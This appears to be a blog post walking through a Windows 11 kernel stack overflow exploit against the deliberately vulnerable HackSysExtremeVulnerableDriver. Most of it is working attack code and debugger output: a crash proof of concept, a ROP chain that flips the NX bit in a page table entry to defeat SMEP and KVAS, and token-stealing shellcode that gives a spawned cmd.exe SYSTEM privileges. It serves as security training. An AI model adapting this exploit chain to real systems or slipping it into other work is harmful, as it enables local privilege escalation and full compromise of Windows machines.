Windows Kernel Driver Exploitation - 1

2022-04-25

Exploiting a kernel stack overflow in Windows 11?

Environment Setup

OS: Windows 11 22000.556 VM
HackSysExtremeVulnerableDriver 3.0

Articles on setting up remote kernel debugging and loading the driver can be easily found online, so I’ll skip that part and focus on the technical details.

Introduction

Since the driver is intentionally vulnerable, there is almost no reverse engineering needed to locate the bug, hence no point writing that part too.

Essentially there is a kernel stack based buffer overflow bug, and we can control RIP at offset 2072 by sending a buffer with ioctl code 0x222003.

First 0x4141414141414141

We’ll start by writing a base code to trigger the vulnerability and control RIP.

#include <stdio.h>
#include <malloc.h>
#include <Windows.h>

#define STACK_OVERFLOW_IOCTL        0x222003
#define PAD_SZ                      2072
#define PAYLOAD_SZ(x)               (sizeof(UINT64) * x)

#define log_warn(x) (printf("[-] Err: %s\n", x))

int main(void)
{
    char        *buf = NULL;
    HANDLE      device = INVALID_HANDLE_VALUE;
    int         c = 0;

    buf = (char *)malloc(PAD_SZ * 2);
    if (!buf) {
        log_warn("malloc");
        goto out;
    }

    memset(buf, 'A', PAD_SZ);
    ((UINT64 *)(buf + PAD_SZ))[c++] = 0x4141414141414141;

    device = CreateFile(L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        log_warn("createfile");
        goto out;
    }

    DeviceIoControl(device, STACK_OVERFLOW_IOCTL, buf, PAD_SZ + PAYLOAD_SZ(c), NULL, 0, NULL, NULL);
    
out:
    if (device != INVALID_HANDLE_VALUE) {
        CloseHandle(device);
        device = INVALID_HANDLE_VALUE;
    }

    if (buf) {
        free(buf);
        buf = NULL;
    }

    return 0;
}

Access violation - code c0000005 (!!! second chance !!!)
fffff806`483566bf c3              ret
1: kd> dq rsp L1
ffff8280`04d8e778  41414141`41414141
1: kd> u rip L1
fffff806`483566bf c3              ret

Running the POC gives us a crash, where we can control RIP reliably.

Theory

From here we have a few options.
We can either attempt to gain shellcode execution, or try to achieve our goals by pure ROP(data only attack).

Since vanilla stack overflow is a rather powerful primitive, I’m more interested to find out if full shellcode execution is possible.

However, the year is 2022 and we are on Windows 11. Even the default installation has tons of mitigations present(SMEP, KASLR, KVAS etc). We definitely have to bypass them in order to get a chance to execute code.

SMEP

Supervisor Mode Execution Prevention is enabled by setting the 20th bit of the CR4 register as shown below.

0: kd> r cr4
cr4=00000000003506f8
0: kd> .formats cr4
Evaluate expression:
  Hex:     00000000`003506f8
  Decimal: 3475192
  Octal:   0000000000000015203370
  Binary:  00000000 00000000 00000000 00000000 00000000 00110101 00000110 11111000

This means any attempt to execute user mode memory while in kernel mode will raise an exception and eventually cause a BSOD.

KASLR

Addresses of ntoskrnl.exe exports and other datastructures are randomized on boot. This is pretty useless from a LPE standpoint, since any medium integrity process can query the system to view export addresses.

KVAS

Kernel Virtual Address Shadow is Windows’ implementation of KPTI. It also implements software based SMEP, which marks user pages as NX regardless of the bits in CR4.

With these in mind, we can start thinking of the bypasses.

Bypassing KASLR is simple. We use documented API EnumDeviceDrivers to get the base address of nt. From there we can calculate the addresses of symbols at runtime.

SMEP however is more difficult to deal with. For starters, we can’t just use ROP to modify CR4, because software based SMEP does not care about that.

Instead, we will have to turn our stack overflow into an arbitrary write primitive, and corrupt some important structures.

PTE

The Page Table Entry is part of the paging structure used by Windows. More details can be found online easily. The important part is that PTE is responsible for indicating whether a page is executable or not.

It is of type MMPTE_HARDWARE

0: kd> !pte 0xFFFFF78000000000
                                           VA fffff78000000000
PXE at FFFF974BA5D2EF78    PPE at FFFF974BA5DEF000    PDE at FFFF974BBDE00000    PTE at FFFF977BC0000000
contains 0000000004E02063  contains 0000000004E03063  contains 0000000004E04063  contains 8000000004331963
pfn 4e02      ---DA--KWEV  pfn 4e03      ---DA--KWEV  pfn 4e04      ---DA--KWEV  pfn 4331      -G-DA--KW-V

0: kd> dt _MMPTE_HARDWARE FFFF977BC0000000
nt!_MMPTE_HARDWARE
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y0
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y1
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y0000000000000000000000000100001100110001 (0x4331)
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y0000
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1
0: kd> .formats poi(FFFF977BC0000000)
Evaluate expression:
  Hex:     80000000`04331963
  Decimal: -9223372036784318109
  Octal:   1000000000000414614543
  Binary:  10000000 00000000 00000000 00000000 00000100 00110011 00011001 01100011
  Chars:   .....3.c
  Time:    ***** Invalid FILETIME
  Float:   low 2.1053e-036 high -0
  Double:  -3.48107e-316

As shown above, we inspect the PTE of a static section KUSER_SHARED_DATA.
This is a writeable page in kernel space, always mapped to the same address 0xFFFFF78000000000.

The NX bit is the highest bit. This means if we clear the most significant byte at the PTE of KUSER_SHARED_DATA, we can make the section executable.

1 2	0: kd> ? 0y0000000000000000000000000000000000000100001100110001100101100011 Evaluate expression: 70457699 = 00000000`04331963

Since the actual important data is only around the first 0x700 bytes of KUSER_SHARED_DATA while pages are 0x1000 bytes, we are free to write anything at around KUSER_SHARED_DATA+0x800.

Now we have a general plan.

Use ROP to disable NX
Copy shellcode to KUSER_SHARED_DATA+0x800
Jump to shellcode

Gadget hunting

As far as I’m familiar with, there are two easy ways to find gadgets in kernel land.

Use a tool like rp++ against C:\Windows\System32\ntoskrnl.exe
Use WinDbg’s search function.

For short gadgets(one instruction before ret), I usually do it in WinDbg directly.

For example, if I’m looking for a pop r14; pop r15; ret; gadget, I’ll do as shown below:

0: kd> lm m nt
Browse full module list
start             end                 module name
fffff806`41800000 fffff806`42847000   nt         (pdb symbols)          C:\ProgramData\dbg\sym\ntkrnlmp.pdb\DCC3FFCBE9C59B5668C1DE2BD6CBC6DF1\ntkrnlmp.pdb
0: kd> s -b fffff806`41800000 fffff806`42847000 41 5e 41 5f c3
fffff806`41c1eaea  41 5e 41 5f c3 cc cc cc-cc cc cc cc 66 66 0f 1f  A^A_........ff..
fffff806`424e2880  41 5e 41 5f c3 00 00 00-78 33 d1 22 85 d1 ff ff  A^A_....x3."....

The arbitrary write gadgets I’ll use revolves around RAX and RCX, since they are the most commonly found registers.

Of course we need:

pop rax; ret;
pop rcx; ret;

Next I used:
mov qword ptr [rax], rcx; ret;

for arbitrary write.

Finally:
add rax, qword ptr [rcx]; ret;
mov byte ptr [rax], rcx; ret;

to manipulate the PTE. We’ll see how it’s done shortly.

PTE Manipulation

Before we can clear the most significant byte of KUSER_SHARED_DATA‘s PTE, we have to locate it in memory.

Windows has a kernel API to do that, nt!MiGetPteAddress

0: kd> u nt!MiGetPteAddress
nt!MiGetPteAddress:
fffff806`41a9dc10 48c1e909        shr     rcx,9
fffff806`41a9dc14 48b8f8ffffff7f000000 mov rax,7FFFFFFFF8h
fffff806`41a9dc1e 4823c8          and     rcx,rax
fffff806`41a9dc21 48b8000000000097ffff mov rax,0FFFF970000000000h
fffff806`41a9dc2b 4803c1          add     rax,rcx
fffff806`41a9dc2e c3              ret

As per __fastcall convention, RCX holds the first argument passed to this function, which is the address mapped by the PTE.

So if we want to find the PTE of address X, we do ( (X >> 9) & 0x7ffffffff8 ) + PTE_BASE

PTE_BASE is affected by KASLR, but we can dynamically locate it at nt!MiGetPteAddress+0x13

1 2	0: kd> dq nt!MiGetPteAddress+0x13 L1 fffff806`41a9dc23 ffff9700`00000000

Hence, we first feed the (X >> 9) & 0x7ffffffff8 part into RAX, and point RCX to nt!MiGetPteAddress+0x13

Then we can use gadget 4 to compute the PTE address, before using gadget 5 to clear the most significant byte.

The code will look like this:

#define OFF_POP_RCX                 0x4126a0            // nt!HvlEndSystemInterrupt+0x20
#define OFF_POP_RAX                 0x92dbbd            // nt!FsRtlNotifyFilterReportChangeLite+0x4d
#define OFF_MOV_DEREF_RAX_RCX       0x2efac4            // nt!KiMoveApcState+0x74
#define OFF_ADD_RAX_DEREF_RCX       0xbc08cb            // unknown name
#define OFF_MOV_BYTE_DEREF_RAX_CL   0x576bc0            // nt!KiGetPastDueIRTimerInfo+0x40

#define WRITE_MEM                   0xFFFFF78000000800  // KUSER_SHARED_DATA+0x800
#define OFF_PTE_BASE                0x29dc23            // nt!MiGetPteAddress+0x13

((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RAX;
((UINT64 *)(buf + PAD_SZ))[c++] = ((WRITE_MEM >> 9) & 0x7ffffffff8) + 7; // +7 to get to most significant byte
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_PTE_BASE;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_ADD_RAX_DEREF_RCX;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
((UINT64 *)(buf + PAD_SZ))[c++] = 0;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_MOV_BYTE_DEREF_RAX_CL;

Shellcoding

Kernel shellcode is rather simple and does not require us to resolve any addresses.

Extensive documentation can be found online, so I’ll just talk about the parts I modified.

// rax contains pid of spawned cmd

    mov    r12, QWORD PTR gs:0x188
    mov    r12, QWORD PTR [r12+0xb8]
    mov    rbx, r12

    loop1:
    mov    rbx,QWORD PTR [rbx+0x448]
    sub    rbx,0x448
    mov    rcx,QWORD PTR [rbx+0x440]
    cmp    rcx,0x4
    jne    loop1

    loop2:
    mov r12, qword ptr [r12+0x448]
    sub r12, 0x448
    mov rcx, qword ptr [r12+0x440]
    cmp rcx, rax
    jne loop2

    mov    rcx,QWORD PTR [rbx+0x4b8]
    mov    QWORD PTR [r12+0x4b8],rcx
    jmp    $

Firstly, the offset to the ActiveProcessLinks and Token changed from Windows 10 to Windows 11, so it’s important to find it with WinDbg.

At the end of the shellcode, I inserted an infinite loop, because I found proper kernel recovery extremely difficult. I could have used nt!KiDelayExecutionThread as a cleaner way to suspend the thread, but that led to a crash very quickly, possibly due to resource locking.

Since the current thread will be spinning forever, I can’t just copy the privileged token to the current process. Instead I’ll pass the PID of a new process in RAX, and relay the token to it.

Some people prefer to clear the refcount of the token, but I found it to be pointless because 1. the refcount is not really strictly controlled, as inferred from ReactOS’s source code(if refcount==1, bring it back to maximum again), and 2. it’s just a fast refcount, even if it runs out, a slow path will be taken and things still work just fine.

To convert assembly to shellcode, I simply used an online assembler and python.

def make(s):
    c = 0
    out = ""
    for i in s:
        c += 1
        out = hex(ord(i))[2:].rjust(2, "0") + out
        if c == 8:
            print("0x" + out)
            c = 0
            out = ""
    print("0x" + out)

make("\x65\x4C\x8B....snippet....)

Final Exploit

#include <stdio.h>
#include <malloc.h>
#include <Windows.h>
#include <Psapi.h>

#define STACK_OVERFLOW_IOCTL        0x222003
#define PAD_SZ                      2072
#define PAYLOAD_SZ(x)               (sizeof(UINT64) * x)

#define OFF_POP_RCX                 0x4126a0            // nt!HvlEndSystemInterrupt+0x20
#define OFF_POP_RAX                 0x92dbbd            // nt!FsRtlNotifyFilterReportChangeLite+0x4d
#define OFF_MOV_DEREF_RAX_RCX       0x2efac4            // nt!KiMoveApcState+0x74
#define OFF_ADD_RAX_DEREF_RCX       0xbc08cb            // unknown name
#define OFF_MOV_BYTE_DEREF_RAX_CL   0x576bc0            // nt!KiGetPastDueIRTimerInfo+0x40

#define WRITE_MEM                   0xFFFFF78000000800  // KUSER_SHARED_DATA+0x800
#define OFF_PTE_BASE                0x29dc23            // nt!MiGetPteAddress+0x13

#define log_warn(x) (printf("[-] Err: %s\n", x))

void make_payload(_Inout_ char *buf, _Inout_ int *c, _In_ LPVOID nt, _In_ UINT64 *shellcode, _In_ size_t len);

int main(void)
{
    char        *buf = NULL;
    HANDLE      device = INVALID_HANDLE_VALUE;
    LPVOID      addr[8] = { 0 };
    DWORD       needed;
    LPVOID      nt;
    int         c = 0;

    /* 
    * 
    * rax contains pid of spawned cmd
    * 
        mov    r12, QWORD PTR gs:0x188
        mov    r12, QWORD PTR [r12+0xb8]
        mov    rbx, r12

        loop1:
        mov    rbx,QWORD PTR [rbx+0x448]
        sub    rbx,0x448
        mov    rcx,QWORD PTR [rbx+0x440]
        cmp    rcx,0x4
        jne    loop1

        loop2:
        mov r12, qword ptr [r12+0x448]
        sub r12, 0x448
        mov rcx, qword ptr [r12+0x440]
        cmp rcx, rax
        jne loop2

        mov    rcx,QWORD PTR [rbx+0x4b8]
        mov    QWORD PTR [r12+0x4b8],rcx
        jmp    $
    */

    UINT64      shellcode[] = {
        0x00018825248b4c65,
        0x0000b824a48b4d00,
        0x489b8b48e3894c00,
        0x0448eb8148000004,
        0x0004408b8b480000,
        0x4de57504f9834800,
        0x490000044824a48b,
        0x8b4900000448ec81,
        0x394800000440248c,
        0x04b88b8b48e475c1,
        0x04b8248c89490000,
        0xfeeb0000
    };
    PROCESS_INFORMATION pi = { 0 };
    STARTUPINFOA si = { 0 };

    puts("[+] Exploit start");
    
    puts("[+] Getting nt base address");
    
    EnumDeviceDrivers(addr, sizeof(addr), &needed);
    if (!addr[0]) {
        log_warn("EnumDeviceDrivers");
        goto out;
    }

    nt = addr[0];
    printf("[+] nt base address: %p\n", nt);

    buf = (char *)malloc(PAD_SZ * 2);
    if (!buf) {
        log_warn("malloc");
        goto out;
    }

    char cmd[200] = { 0 };
    snprintf(cmd, sizeof(cmd), "C:\\Windows\\system32\\cmd.exe");

    BOOL status = CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    if (!status) {
        log_warn("createprocess");
        printf("%p\n", GetLastError());
        goto out;
    }

    DWORD pid = GetProcessId(pi.hProcess);
    printf("[+] cmd.exe process id: %d\n", pid);

    memset(buf, 'A', PAD_SZ);
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RAX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = ((WRITE_MEM >> 9) & 0x7ffffffff8) + 7; // +7 to get to most significant byte
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_PTE_BASE;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_ADD_RAX_DEREF_RCX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = 0;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_MOV_BYTE_DEREF_RAX_CL;
    make_payload(buf, &c, nt, shellcode, sizeof(shellcode) / sizeof(UINT64));
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RAX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)pid;
    ((UINT64 *)(buf + PAD_SZ))[c++] = WRITE_MEM; // shellcode
    
    device = CreateFile(L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        log_warn("createfile");
        goto out;
    }

    DeviceIoControl(device, STACK_OVERFLOW_IOCTL, buf, PAD_SZ + PAYLOAD_SZ(c), NULL, 0, NULL, NULL);
    
out:
    if (device != INVALID_HANDLE_VALUE) {
        CloseHandle(device);
        device = INVALID_HANDLE_VALUE;
    }

    if (buf) {
        free(buf);
        buf = NULL;
    }

    return 0;
}

void make_payload(_Inout_ char *buf, _Inout_ int *c, _In_ LPVOID nt, _In_ UINT64 *shellcode, _In_ size_t len)
{
    for (int i = 0; i < len; i++) {
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = (UINT64)nt + OFF_POP_RAX;
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = WRITE_MEM + i * sizeof(UINT64);
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = (UINT64)nt + OFF_POP_RCX;
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = shellcode[i];
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = (UINT64)nt + OFF_MOV_DEREF_RAX_RCX;
    }
}

system!

Conclusion

Feels amazing to finally do some research related to the Windows Kernel, a dream target of mine to hack. However I do need to learn to perform proper kernel recovery, because incorrectly letting the thread spin wastes a lot of CPU and might cause system instability. Recently bought the Windows Kernel Programming 2nd Edition book, and hopefully I’ll learn more about Windows Internals. Looking forward to many more blog posts on Windows Kernel :)